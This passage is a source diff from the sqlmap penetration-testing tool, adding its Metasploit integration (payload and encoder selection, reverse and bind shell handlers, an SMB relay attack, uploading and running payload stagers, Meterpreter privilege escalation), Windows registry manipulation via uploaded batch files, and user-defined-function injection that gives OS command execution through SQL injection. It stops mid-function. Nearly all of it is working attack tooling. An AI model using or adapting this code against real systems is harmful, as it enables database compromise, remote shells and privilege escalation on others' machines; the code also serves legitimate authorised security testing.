+                                                   6: ( "Single-byte XOR Countdown Encoder", "x86/countdown" ),
+                                                   7: ( "Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov" ),
+                                                   8: ( "Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive" ),
+                                                   9: ( "Non-Alpha Encoder", "x86/nonalpha" ),
+                                                  10: ( "Non-Upper Encoder", "x86/nonupper" ),
+                                                  11: ( "Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai" ),
+                                                  12: ( "Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed" ),
+                                                  13: ( "Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper" ),
+                                                 }
+                                    }
+
+        self.__msfSMBPortsList    = {
+                                      "windows": {
+                                                   1: ( "139/TCP (default)", "139" ),
+                                                   2: ( "445/TCP", "445" ),
+                                                 }
+                                    }
+
+        self.__portData           = {
+                                      "bind":    "remote port number",
+                                      "reverse": "local port number",
+                                    }
+
+    def __skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
+        if kb.os == "Windows":
+            opSys = "windows"
+        else:
+            opSys = "linux"
+
+        message = "which %s do you want to use?" % msg
+
+        if lst:
+            for num, data in lst[opSys].items():
+                description = data[0]
+
+                if num > maxValue:
+                    maxValue = num
+
+                if "(default)" in description:
+                    default = num
+
+                message += "\n[%d] %s" % (num, description)
+        else:
+            message += " [%d] " % default
+
+        choice = readInput(message, default="%d" % default)
+
+        if not choice:
+            if lst:
+                choice = str(default)
+            else:
+                return default
+
+        elif not choice.isdigit():
+            logger.warn("invalid value, only digits are allowed")
+            return self.__skeletonSelection(msg, lst, maxValue, default)
+
+        elif int(choice) > maxValue or int(choice) < 1:
+            logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue)
+            return self.__skeletonSelection(msg, lst, maxValue, default)
+
+        choice = int(choice)
+
+        if lst:
+            choice = lst[opSys][choice][1]
+
+        return choice
+
+    def __selectSMBPort(self):
+        return self.__skeletonSelection("SMB port", self.__msfSMBPortsList)
+
+    def __selectEncoder(self, encode=True):
+        if isinstance(encode, str):
+            return encode
+
+        elif kb.os == "Windows" and encode:
+            return self.__skeletonSelection("payload encoding", self.__msfEncodersList)
+
+    def __selectPayload(self):
+        if kb.os == "Windows" and conf.privEsc:
+            infoMsg  = "forcing Metasploit payload to Meterpreter because "
+            infoMsg += "it is the only payload that can be used to "
+            infoMsg += "escalate privileges, either via 'incognito' "
+            infoMsg += "extension or via 'getsystem' command"
+            logger.info(infoMsg)
+
+            __payloadStr = "windows/meterpreter"
+
+        else:
+            __payloadStr = self.__skeletonSelection("payload", self.__msfPayloadsList)
+
+        if __payloadStr == "windows/vncinject":
+            choose = False
+
+            if kb.dbms == "MySQL":
+                debugMsg  = "by default MySQL on Windows runs as SYSTEM "
+                debugMsg += "user, it is likely that the the VNC "
+                debugMsg += "injection will be successful"
+                logger.debug(debugMsg)
+
+            elif kb.dbms == "PostgreSQL":
+                choose = True
+
+                warnMsg  = "by default PostgreSQL on Windows runs as "
+                warnMsg += "postgres user, it is unlikely that the VNC "
+                warnMsg += "injection will be successful"
+                logger.warn(warnMsg)
+
+            elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
+                choose = True
+
+                warnMsg  = "it is unlikely that the VNC injection will be "
+                warnMsg += "successful because usually Microsoft SQL Server "
+                warnMsg += "%s runs as Network Service " % kb.dbmsVersion[0]
+                warnMsg += "or the Administrator is not logged in"
+                logger.warn(warnMsg)
+
+            if choose:
+                message  = "what do you want to do?\n"
+                message += "[1] Give it a try anyway\n"
+                message += "[2] Fall back to Meterpreter payload (default)\n"
+                message += "[3] Fall back to Shell payload"
+
+                while True:
+                    choice = readInput(message, default="2")
+
+                    if not choice or choice == "2":
+                        __payloadStr = "windows/meterpreter"
+
+                        break
+
+                    elif choice == "3":
+                        __payloadStr = "windows/shell"
+
+                        break
+
+                    elif choice == "1":
+                        if kb.dbms == "PostgreSQL":
+                            logger.warn("beware that the VNC injection might not work")
+
+                            break
+
+                        elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
+                            break
+
+                    elif not choice.isdigit():
+                        logger.warn("invalid value, only digits are allowed")
+
+                    elif int(choice) < 1 or int(choice) > 2:
+                        logger.warn("invalid value, it must be 1 or 2")
+
+        return __payloadStr
+
+    def __selectPort(self):
+        for connType, connStr in self.__portData.items():
+            if self.connectionStr.startswith(connType):
+                return self.__skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535))
+
+    def __selectRhost(self):
+        if self.connectionStr.startswith("bind"):
+            message = "which is the back-end DBMS address? [%s] " % self.remoteIP
+            address = readInput(message, default=self.remoteIP)
+
+            if not address:
+                address = self.remoteIP
+
+            return address
+
+        elif self.connectionStr.startswith("reverse"):
+            return None
+
+        else:
+            raise sqlmapDataException, "unexpected connection type"
+
+    def __selectLhost(self):
+        if self.connectionStr.startswith("reverse") or self.resourceFile is not None:
+            message = "which is the local address? [%s] " % self.localIP
+            address = readInput(message, default=self.localIP)
+
+            if not address:
+                address = self.localIP
+
+            return address
+
+        elif self.connectionStr.startswith("bind"):
+            return None
+
+        else:
+            raise sqlmapDataException, "unexpected connection type"
+
+    def __selectConnection(self):
+        return self.__skeletonSelection("connection type", self.__msfConnectionsList)
+
+    def __prepareIngredients(self, encode=True):
+        self.connectionStr  = self.__selectConnection()
+        self.lhostStr       = self.__selectLhost()
+        self.rhostStr       = self.__selectRhost()
+        self.portStr        = self.__selectPort()
+        self.payloadStr     = self.__selectPayload()
+        self.encoderStr     = self.__selectEncoder(encode)
+
+        if self.payloadStr == "linux/x86/shell":
+            self.payloadConnStr = "%s_%s" % (self.payloadStr, self.connectionStr)
+        else:
+            self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
+
+    def __forgeMsfCliCmd(self, exitfunc="process"):
+        self.__cliCmd  = "%s multi/handler PAYLOAD=%s" % (self.__msfCli, self.payloadConnStr)
+        self.__cliCmd += " EXITFUNC=%s" % exitfunc
+        self.__cliCmd += " LPORT=%s" % self.portStr
+
+        if self.payloadStr == "windows/vncinject":
+            self.__cliCmd += " DisableCourtesyShell=1"
+
+        if self.connectionStr.startswith("bind"):
+            self.__cliCmd += " RHOST=%s" % self.rhostStr
+
+        elif self.connectionStr.startswith("reverse"):
+            self.__cliCmd += " LHOST=%s" % self.lhostStr
+
+        else:
+            raise sqlmapDataException, "unexpected connection type"
+
+        self.__cliCmd += " E"
+
+    def __forgeMsfConsoleCmd(self):
+        self.__consoleCmd = "%s -r %s" % (self.__msfConsole, self.resourceFile)
+
+    def __forgeMsfConsoleResource(self):
+        self.resourceFile = os.path.join(conf.outputPath, self.__randFile)
+
+        self.__prepareIngredients(encode=False)
+
+        self.__resource  = "use windows/smb/smb_relay\n"
+        self.__resource += "set SRVHOST %s\n" % self.lhostStr
+        self.__resource += "set SRVPORT %s\n" % self.__selectSMBPort()
+        self.__resource += "set PAYLOAD %s\n" % self.payloadConnStr
+        self.__resource += "set LPORT %s\n" % self.portStr
+
+        if self.connectionStr.startswith("bind"):
+            self.__resource += "set RHOST %s\n" % self.rhostStr
+
+        elif self.connectionStr.startswith("reverse"):
+            self.__resource += "set LHOST %s\n" % self.lhostStr
+
+        else:
+            raise sqlmapDataException, "unexpected connection type"
+
+        self.__resource += "exploit\n"
+
+        self.resourceFp = open(self.resourceFile, "w")
+        self.resourceFp.write(self.__resource)
+        self.resourceFp.close()
+
+    def __forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
+        self.__payloadCmd  = "%s %s" % (self.__msfPayload, self.payloadConnStr)
+        self.__payloadCmd += " EXITFUNC=%s" % exitfunc
+        self.__payloadCmd += " LPORT=%s" % self.portStr
+
+        if self.connectionStr.startswith("reverse"):
+            self.__payloadCmd += " LHOST=%s" % self.lhostStr
+
+        elif not self.connectionStr.startswith("bind"):
+            raise sqlmapDataException, "unexpected connection type"
+
+        if kb.os == "Windows" or extra == "BufferRegister=EAX":
+            self.__payloadCmd += " R | %s -a x86 -e %s -o %s -t %s" % (self.__msfEncode, self.encoderStr, outFile, format)
+
+            if extra is not None:
+                self.__payloadCmd += " %s" % extra
+        else:
+            self.__payloadCmd += " X > %s" % outFile
+
+    def __runMsfCli(self, exitfunc):
+        self.__forgeMsfCliCmd(exitfunc)
+
+        infoMsg  = "running Metasploit Framework 3 command line "
+        infoMsg += "interface locally, wait.."
+        logger.info(infoMsg)
+
+        logger.debug("executing local command: %s" % self.__cliCmd)
+        self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE)
+
+    def __runMsfConsole(self):
+        infoMsg = "running Metasploit Framework 3 console locally, wait.."
+        logger.info(infoMsg)
+
+        logger.debug("executing local command: %s" % self.__consoleCmd)
+        self.__msfConsoleProc = execute(self.__consoleCmd, shell=True, stdin=PIPE, stdout=PIPE)
+
+    def __runMsfShellcodeRemote(self):
+        infoMsg  = "running Metasploit Framework 3 shellcode "
+        infoMsg += "remotely via UDF 'sys_bineval', wait.."
+        logger.info(infoMsg)
+
+        self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
+
+    def __runMsfPayloadRemote(self):
+        infoMsg  = "running Metasploit Framework 3 payload stager "
+        infoMsg += "remotely, wait.."
+        logger.info(infoMsg)
+
+        if kb.os != "Windows":
+            self.execCmd("chmod +x %s" % self.exeFilePathRemote, silent=True)
+
+        cmd = "%s &" % self.exeFilePathRemote
+
+        if kb.dbms == "Microsoft SQL Server" and kb.stackedTest:
+            cmd = self.xpCmdshellForgeCmd(cmd)
+
+        self.execCmd(cmd, silent=True)
+
+    def __loadMetExtensions(self, proc, metSess):
+        if kb.os != "Windows":
+            return
+
+        if self.resourceFile is not None:
+            proc.stdin.write("sessions -l\n")
+            proc.stdin.write("sessions -i %s\n" % metSess)
+
+        proc.stdin.write("use espia\n")
+        proc.stdin.write("use incognito\n")
+        proc.stdin.write("use priv\n")
+        proc.stdin.write("use sniffer\n")
+        proc.stdin.write("sysinfo\n")
+        proc.stdin.write("getuid\n")
+
+        if conf.privEsc:
+            print
+
+            infoMsg  = "trying to escalate privileges using Meterpreter "
+            infoMsg += "'getsystem' command which tries different "
+            infoMsg += "techniques, including kitrap0d"
+            logger.info(infoMsg)
+
+            proc.stdin.write("getsystem\n")
+
+            infoMsg  = "displaying the list of Access Tokens availables. "
+            infoMsg += "Choose which user you want to impersonate by "
+            infoMsg += "using incognito's command 'impersonate_token' if "
+            infoMsg += "'getsystem' does not success to elevate privileges"
+            logger.info(infoMsg)
+
+            proc.stdin.write("list_tokens -u\n")
+            proc.stdin.write("getuid\n")
+
+
+    def __controlMsfCmd(self, proc, func):
+        stdin_fd = sys.stdin.fileno()
+        setNonBlocking(stdin_fd)
+
+        proc_out_fd = proc.stdout.fileno()
+        setNonBlocking(proc_out_fd)
+
+        while True:
+            returncode = proc.poll()
+
+            if returncode is None:
+                # Child hasn't exited yet
+                pass
+            else:
+                logger.debug("connection closed properly")
+                return returncode
+
+            try:
+                ready_fds = select([stdin_fd, proc_out_fd], [], [], 1)
+
+                if stdin_fd in ready_fds[0]:
+                    try:
+                        proc.stdin.write(blockingReadFromFD(stdin_fd))
+                    except IOError:
+                        # Probably the child has exited
+                        pass
+
+                if proc_out_fd in ready_fds[0]:
+                    out = blockingReadFromFD(proc_out_fd)
+                    blockingWriteToFD(sys.stdout.fileno(), out)
+
+                    # For --os-pwn and --os-bof
+                    pwnBofCond  = self.connectionStr.startswith("reverse")
+                    pwnBofCond &= "Starting the payload handler" in out
+
+                    # For --os-smbrelay
+                    smbRelayCond = "Server started" in out
+
+                    if pwnBofCond or smbRelayCond:
+                        func()
+
+                    if "Starting the payload handler" in out and "shell" in self.payloadStr:
+                        if kb.os == "Windows":
+                            proc.stdin.write("whoami\n")
+                        else:
+                            proc.stdin.write("uname -a ; id\n")
+
+                    metSess = re.search("Meterpreter session ([\d]+) opened", out)
+
+                    if metSess:
+                        self.__loadMetExtensions(proc, metSess.group(1))
+
+            except EOFError:
+                returncode = proc.wait()
+
+                return returncode
+
+    def createMsfShellcode(self, exitfunc, format, extra, encode):
+        infoMsg = "creating Metasploit Framework 3 multi-stage shellcode "
+        logger.info(infoMsg)
+
+        self.__randStr           = randomStr(lowercase=True)
+        self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
+
+        self.__initVars()
+        self.__prepareIngredients(encode=encode)
+        self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra)
+
+        logger.debug("executing local command: %s" % self.__payloadCmd)
+        process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
+
+        dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
+        pollProcess(process)
+        payloadStderr = process.communicate()[1]
+
+        if kb.os == "Windows" or extra == "BufferRegister=EAX":
+            payloadSize = re.search("size ([\d]+)", payloadStderr, re.I)
+        else:
+            payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
+
+        if payloadSize:
+            payloadSize = int(payloadSize.group(1))
+
+            if extra == "BufferRegister=EAX":
+                payloadSize = payloadSize / 2
+
+            debugMsg = "the shellcode size is %d bytes" % payloadSize
+            logger.debug(debugMsg)
+        else:
+            errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", "")
+            raise sqlmapFilePathException, errMsg
+
+        self.__shellcodeFP   = open(self.__shellcodeFilePath, "rb")
+        self.shellcodeString = self.__shellcodeFP.read()
+        self.__shellcodeFP.close()
+
+        os.unlink(self.__shellcodeFilePath)
+
+    def createMsfPayloadStager(self, initialize=True):
+        if initialize:
+            infoMsg = ""
+        else:
+            infoMsg = "re"
+
+        infoMsg += "creating Metasploit Framework 3 payload stager"
+
+        logger.info(infoMsg)
+
+        self.__randStr = randomStr(lowercase=True)
+
+        if kb.os == "Windows":
+            self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s.exe" % self.__randStr)
+
+            # Metasploit developers added support for the old exe format
+            # to msfencode using '-t exe-small' (>= 3.3.3-dev),
+            # http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
+            # This is useful for sqlmap because on PostgreSQL it is not
+            # possible to write files bigger than 8192 bytes abusing the
+            # lo_export() feature implemented in sqlmap.
+            if kb.dbms == "PostgreSQL":
+                self.__fileFormat = "exe-small"
+            else:
+                self.__fileFormat = "exe"
+        else:
+            self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
+            self.__fileFormat     = "elf"
+
+        if initialize:
+            self.__initVars()
+
+        if self.payloadStr is None:
+            self.__prepareIngredients()
+
+        self.__forgeMsfPayloadCmd("process", self.__fileFormat, self.exeFilePathLocal)
+
+        logger.debug("executing local command: %s" % self.__payloadCmd)
+        process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
+
+        dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
+        pollProcess(process)
+        payloadStderr = process.communicate()[1]
+
+        if kb.os == "Windows":
+            payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
+        else:
+            payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
+
+        os.chmod(self.exeFilePathLocal, stat.S_IRWXU)
+
+        if payloadSize:
+            payloadSize = payloadSize.group(1)
+            exeSize     = os.path.getsize(self.exeFilePathLocal)
+
+            # Only pack the payload stager if the back-end DBMS operating
+            # system is Windows and new portable executable template is
+            # used
+            if self.__fileFormat == "exe":
+                packedSize = upx.pack(self.exeFilePathLocal)
+            else:
+                packedSize = None
+
+            debugMsg    = "the encoded payload size is %s bytes, " % payloadSize
+
+            if packedSize and packedSize < exeSize:
+                debugMsg += "as a compressed portable executable its size "
+                debugMsg += "is %d bytes, decompressed it " % packedSize
+                debugMsg += "was %s bytes large" % exeSize
+            else:
+                debugMsg += "as a portable executable its size is "
+                debugMsg += "%s bytes" % exeSize
+
+            logger.debug(debugMsg)
+        else:
+            errMsg = "failed to create the payload stager (%s)" % payloadStderr
+            raise sqlmapFilePathException, errMsg
+
+    def uploadMsfPayloadStager(self, web=False):
+        if web:
+            self.exeFilePathRemote = "%s/%s" % (self.webDirectory, os.path.basename(self.exeFilePathLocal))
+        else:
+            self.exeFilePathRemote = "%s/%s" % (conf.tmpPath, os.path.basename(self.exeFilePathLocal))
+
+        self.exeFilePathRemote = normalizePath(self.exeFilePathRemote)
+
+        logger.info("uploading payload stager to '%s'" % self.exeFilePathRemote)
+
+        if web:
+            self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote, self.webDirectory)
+        else:
+            self.writeFile(self.exeFilePathLocal, self.exeFilePathRemote, "binary", False)
+
+        os.unlink(self.exeFilePathLocal)
+
+    def pwn(self, goUdf=False):
+        if goUdf:
+            exitfunc = "thread"
+            func     = self.__runMsfShellcodeRemote
+        else:
+            exitfunc = "process"
+            func     = self.__runMsfPayloadRemote
+
+        self.__runMsfCli(exitfunc=exitfunc)
+
+        if self.connectionStr.startswith("bind"):
+            func()
+
+        debugMsg  = "Metasploit Framework 3 command line interface exited "
+        debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func)
+        logger.debug(debugMsg)
+
+        if not goUdf:
+            self.delRemoteFile(self.exeFilePathRemote, doubleslash=True)
+
+    def smb(self):
+        self.__initVars()
+        self.__randFile = "tmpu%s.txt" % randomStr(lowercase=True)
+
+        self.__forgeMsfConsoleResource()
+        self.__forgeMsfConsoleCmd()
+
+        if kb.dbms in ( "MySQL", "PostgreSQL" ):
+            self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self.__randFile)
+        else:
+            self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
+
+        self.__runMsfConsole()
+
+        debugMsg  = "Metasploit Framework 3 console exited with return "
+        debugMsg += "code %s" % self.__controlMsfCmd(self.__msfConsoleProc, self.uncPathRequest)
+        logger.debug(debugMsg)
+
+        os.unlink(self.resourceFile)
+
+    def bof(self):
+        self.__runMsfCli(exitfunc="seh")
+
+        if self.connectionStr.startswith("bind"):
+            self.spHeapOverflow()
+
+        debugMsg  = "Metasploit Framework 3 command line interface exited "
+        debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, self.spHeapOverflow)
+        logger.debug(debugMsg)
--- a/lib/takeover/registry.py
+++ b/lib/takeover/registry.py
@@ -0,0 +1,134 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import os
+
+from lib.core.common import randomStr
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+
+class Registry:
+    """
+    This class defines methods to read and write Windows registry keys
+    """
+
+    def __initVars(self, regKey, regValue, regType=None, regData=None, parse=False):
+        self.__regKey        = regKey
+        self.__regValue      = regValue
+        self.__regType       = regType
+        self.__regData       = regData
+
+        self.__randStr       = randomStr(lowercase=True)
+        self.__batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self.__randStr)
+        self.__batPathLocal  = os.path.join(conf.outputPath, "tmpr%s.bat" % self.__randStr)
+
+        if parse:
+            readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self.__regKey + "\" /v \"" + self.__regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n"
+        else:
+            readParse = "REG QUERY \"" + self.__regKey + "\" /v \"" + self.__regValue + "\""
+
+        self.__batRead = (
+                           "@ECHO OFF\r\n",
+                           readParse
+                         )
+
+        self.__batAdd  = (
+                           "@ECHO OFF\r\n",
+                           "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self.__regKey, self.__regValue, self.__regType, self.__regData)
+                         )
+
+        self.__batDel  = (
+                           "@ECHO OFF\r\n",
+                           "REG DELETE \"%s\" /v \"%s\" /f" % (self.__regKey, self.__regValue)
+                         )
+
+    def __createLocalBatchFile(self):
+        self.__batPathFp = open(self.__batPathLocal, "w")
+
+        if self.__operation == "read":
+            lines = self.__batRead
+        elif self.__operation == "add":
+            lines = self.__batAdd
+        elif self.__operation == "delete":
+            lines = self.__batDel
+
+        for line in lines:
+            self.__batPathFp.write(line)
+
+        self.__batPathFp.close()
+
+    def __createRemoteBatchFile(self):
+        logger.debug("creating batch file '%s'" % self.__batPathRemote)
+
+        self.__createLocalBatchFile()
+        self.writeFile(self.__batPathLocal, self.__batPathRemote, "text", False)
+
+        os.unlink(self.__batPathLocal)
+
+    def readRegKey(self, regKey, regValue, parse=False):
+        self.__operation = "read"
+
+        self.__initVars(regKey, regValue, parse=parse)
+        self.__createRemoteBatchFile()
+
+        logger.debug("reading registry key '%s' value '%s'" % (regKey, regValue))
+
+        data = self.evalCmd(self.__batPathRemote)
+        
+        if data and not parse:
+            pattern = '    '
+            index = data.find(pattern)
+            if index != -1:
+                data = data[index + len(pattern):]
+
+        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+
+        return data
+
+    def addRegKey(self, regKey, regValue, regType, regData):
+        self.__operation = "add"
+
+        self.__initVars(regKey, regValue, regType, regData)
+        self.__createRemoteBatchFile()
+
+        debugMsg  = "adding registry key value '%s' " % self.__regValue
+        debugMsg += "to registry key '%s'" % self.__regKey
+        logger.debug(debugMsg)
+
+        self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
+        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
+
+    def delRegKey(self, regKey, regValue):
+        self.__operation = "delete"
+
+        self.__initVars(regKey, regValue)
+        self.__createRemoteBatchFile()
+
+        debugMsg  = "deleting registry key value '%s' " % self.__regValue
+        debugMsg += "from registry key '%s'" % self.__regKey
+        logger.debug(debugMsg)
+
+        self.execCmd(cmd=self.__batPathRemote, forgeCmd=True)
+        self.delRemoteFile(self.__batPathRemote, doubleslash=True)
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -0,0 +1,385 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import os
+
+from lib.core.agent import agent
+from lib.core.common import readInput
+from lib.core.convert import urlencode
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.dump import dumper
+from lib.core.exception import sqlmapFilePathException
+from lib.core.exception import sqlmapMissingMandatoryOptionException
+from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.unescaper import unescaper
+from lib.request import inject
+from lib.techniques.outband.stacked import stackedTest
+
+
+class UDF:
+    """
+    This class defines methods to deal with User-Defined Functions for
+    plugins.
+    """
+
+    def __init__(self):
+        self.createdUdf  = set()
+        self.udfs        = {}
+        self.udfToCreate = set()
+
+    def __askOverwriteUdf(self, udf):
+        message  = "UDF '%s' already exists, do you " % udf
+        message += "want to overwrite it? [y/N] "
+        output   = readInput(message, default="N")
+
+        if output and output[0] in ("y", "Y"):
+            return True
+        else:
+            return False
+
+    def __checkExistUdf(self, udf):
+        logger.info("checking if UDF '%s' already exist" % udf)
+
+        query  = agent.forgeCaseStatement(queries[kb.dbms].checkUdf % (udf, udf))
+        exists = inject.getValue(query, resumeValue=False, unpack=False, charsetType=2)
+
+        if exists == "1":
+            return True
+        else:
+            return False
+
+    def udfCheckAndOverwrite(self, udf):
+        exists    = self.__checkExistUdf(udf)
+        overwrite = True
+
+        if exists:
+            overwrite = self.__askOverwriteUdf(udf)
+
+        if overwrite:
+            self.udfToCreate.add(udf)
+
+    def udfCreateSupportTbl(self, dataType):
+        debugMsg = "creating a support table for user-defined functions"
+        logger.debug(debugMsg)
+
+        self.createSupportTbl(self.cmdTblName, self.tblField, dataType)
+
+    def udfExecCmd(self, cmd, silent=False, udfName=None):
+        if udfName is None:
+            cmd     = "'%s'" % cmd
+            udfName = "sys_exec"
+
+        cmd = unescaper.unescape(cmd)
+        cmd = urlencode(cmd, convall=True)
+
+        inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
+
+    def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
+        if udfName is None:
+            cmd     = "'%s'" % cmd
+            udfName = "sys_eval"
+
+        cmd = unescaper.unescape(cmd)
+        cmd = urlencode(cmd, convall=True)
+
+        inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
+        output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last)
+        inject.goStacked("DELETE FROM %s" % self.cmdTblName)
+
+        if isinstance(output, (list, tuple)):
+            output = output[0]
+
+            if isinstance(output, (list, tuple)):
+                output = output[0]
+
+        return output
+
+    def udfCheckNeeded(self):
+        if ( not conf.rFile or ( conf.rFile and kb.dbms != "PostgreSQL" ) ) and "sys_fileread" in self.sysUdfs:
+            self.sysUdfs.pop("sys_fileread")
+
+        if not conf.osPwn:
+            self.sysUdfs.pop("sys_bineval")
+
+        if not conf.osCmd and not conf.osShell and not conf.regRead:
+            self.sysUdfs.pop("sys_eval")
+
+            if not conf.osPwn and not conf.regAdd and not conf.regDel:
+                self.sysUdfs.pop("sys_exec")
+
+    def udfSetRemotePath(self):
+        errMsg = "udfSetRemotePath() method must be defined within the plugin"
+        raise sqlmapUnsupportedFeatureException(errMsg)
+
+    def udfSetLocalPaths(self):
+        errMsg = "udfSetLocalPaths() method must be defined within the plugin"
+        raise sqlmapUnsupportedFeatureException(errMsg)
+
+    def udfCreateFromSharedLib(self):
+        errMsg = "udfCreateFromSharedLib() method must be defined within the plugin"
+        raise sqlmapUnsupportedFeatureException(errMsg)
+
+    def udfInjectCore(self, udfDict):
+        for udf in udfDict.keys():
+            if udf in self.createdUdf:
+                continue
+
+            self.udfCheckAndOverwrite(udf)
+
+        if len(self.udfToCreate) > 0:
+            self.udfSetRemotePath()
+            self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", False)
+
+        for udf, inpRet in udfDict.items():
+            if udf in self.udfToCreate and udf not in self.createdUdf:
+                self.udfCreateFromSharedLib(udf, inpRet)
+
+        if kb.dbms == "MySQL":
+            supportTblType = "longtext"
+        elif kb.dbms == "PostgreSQL":
+            supportTblType = "text"
+
+        self.udfCreateSupportTbl(supportTblType)
+
+    def udfInjectSys(self):
+        self.udfSetLocalPaths()
+        self.udfCheckNeeded()
+        self.udfInjectCore(self.sysUdfs)
+
+    def udfInjectCustom(self):
+        if kb.dbms not in ( "MySQL", "PostgreSQL" ):
+            errMsg = "UDF injection feature is not yet implemented on %s" % kb.dbms
+            raise sqlmapUnsupportedFeatureException(errMsg)
+
+        stackedTest()
+
+        if not kb.stackedTest:
+            return
+
+        self.checkDbmsOs()
+
+        if self.isDba() == False:
+            warnMsg  = "the functionality requested might not work because "
+            warnMsg += "the session user is not a database administrator"
+            logger.warn(warnMsg)
+
+        if not conf.shLib:
+            msg = "which is the local path of the shared library? "
+
+            while True:
+                self.udfLocalFile = readInput(msg)
+
+                if self.udfLocalFile:
+                    break
+                else:
+                    logger.warn("you need to specify the local path of the shared library")
+        else:
+            self.udfLocalFile = conf.shLib
+
+        if not os.path.exists(self.udfLocalFile):
+            errMsg = "the specified shared library file does not exist"
+            raise sqlmapFilePathException(errMsg)
+
+        if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"):
+            errMsg = "shared library file must end with '.dll' or '.so'"
+            raise sqlmapMissingMandatoryOptionException(errMsg)
+
+        elif self.udfLocalFile.endswith(".so") and kb.os == "Windows":
+            errMsg  = "you provided a shared object as shared library, but "
+            errMsg += "the database underlying operating system is Windows"
+            raise sqlmapMissingMandatoryOptionException(errMsg)
+
+        elif self.udfLocalFile.endswith(".dll") and kb.os == "Linux":
+            errMsg  = "you provided a dynamic-link library as shared library, "
+            errMsg += "but the database underlying operating system is Linux"
+            raise sqlmapMissingMandatoryOptionException(errMsg)
+
+        self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0]
+        self.udfSharedLibExt  = os.path.basename(self.udfLocalFile).split(".")[1]
+
+        msg  = "how many user-defined functions do you want to create "
+        msg += "from the shared library? "
+
+        while True:
+            udfCount = readInput(msg, default=1)
+
+            if isinstance(udfCount, str) and udfCount.isdigit():
+                udfCount = int(udfCount)
+
+                if udfCount <= 0:
+                    logger.info("nothing to inject then")
+                    return
+                else:
+                    break
+
+            elif isinstance(udfCount, int):
+                break
+
+            else:
